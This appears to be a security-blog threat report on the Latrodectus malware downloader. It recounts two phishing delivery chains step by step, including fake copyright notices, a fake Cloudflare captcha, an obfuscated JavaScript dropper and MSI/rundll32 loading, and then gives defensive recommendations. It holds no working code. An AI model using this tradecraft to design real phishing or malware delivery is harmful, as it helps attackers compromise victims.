New TTPs Discovered For Latrodectus Malware Exploit Themes Associated with Microsoft and Cloudflare

Security Researcher has uncovered new TTPs for a backdoor named Latrodectus is being distributed in phishing campaigns using Microsoft Azure and Cloudflare lures to appear legitimate.

Latrodectus (aka Unidentified 111 and IceNova) is a Windows malware downloader first discovered in November 2023, used by threat actors tracked as TA577 and TA578, with its primary function being the download of additional EXE and DLL payloads or executing commands. Researchers have correlated this malware with the creators of the extensively deployed IcedID modular malware loader.

Earlier Attack Sequence:

1. The attack begins with the adversary filling out online contact forms to send fake copyright infringement notices to targeted organizations.
2. The link in the fake notices leads victims to a Google Firebase URL that hosts a JavaScript file. When executed, this file uses the Windows installer (MSIEXEC) to run an MSI file from a WebDAV share, which contains the Latrodecturs DLL payload.
3. Before executing on the victim’s device, the malware performs various sandbox evasion checks to avoid detection. These checks are designed to identify if the malware is running in a sandbox environment commonly used for security analysis.
4. After passing the evasion checks, the malware initializes by sending a victim registration report to its operators, includes information about the infected system and environment.
5. Latrodectus, acting as a downloader, communicates with a command and control (C2) server to receive further instructions.

Recent Attack Sequence:

1. Attack starts with reply-chain phishing emails, containing malicious attachments either PDF attachments or embedded, which lead to the installation of Latrodectus malware.
2. Attachments use generic names like ‘04–25-Inv-Doc-339.pdf’ and pretend to be a document hosted in Microsoft Azure cloud, which must first be downloaded to be viewed.
3. Clicking on the ‘Download Document’ button will redirect the users to a fake ‘Cloudflare security check’ that asks you to solve an easy math question. This is likely to evade email security scanners and deliver the payload only to legitimate users.
4. When the correct answer is entered, the fake Cloudflare captcha will automatically download a JavaScript file pretending to be a document named like “Document_i79_13b364058–83054409r0449–8089z4.js”.
5. The downloaded JavaScript script is heavily obfuscated with comments that include a hidden function that extracts text and executes the script to download an MSI from a hardcoded URL.
6. When the MSI file is installed, it drops a DLL in the %AppData%\Custom_update folder and is launched by rundll32.exe. The file names are likely random per installation.
7. The dropped DLL is the Latrodectus malware, which runs quietly in the background, waiting for payloads to install or commands to execute.

At recent attack flow, the Latrodectus malware has been observed dropping additional payloads such as the Lumma information-stealer and Danabot.

If a device becomes infected with Latrodectus, it is critical to take the system offline as soon as possible and evaluate the network for unusual behavior.

For Indicators of Compromise(IOCs) refer the link

Latrodectus/Latrodectus_29.04.2024.txt at main · pr0xylife/Latrodectus

It is Recommended to :

Monitor the network for presence of mentioned Indicator of Compromise (IOCs).

Implement email security solutions to detect and block phishing emails containing malicious attachments or URLs.

Utilize advanced threat detection mechanisms to analyse email attachments and employ URL filtering technologies to block access to known malicious domains.

Make sure Endpoint Detection & Response tools have been implemented to detect the latest malware and suspicious activities on endpoints.

Enforce the principle of least privilege to limit users’ access to sensitive systems and data and implement multi-factor authentication (MFA).

Implement network segmentation, firewalls, and intrusion detection/prevention systems (IDS/IPS) to monitor and control network traffic.

Raise awareness among your staff about the potential risks associated with opening suspicious emails or documents in general.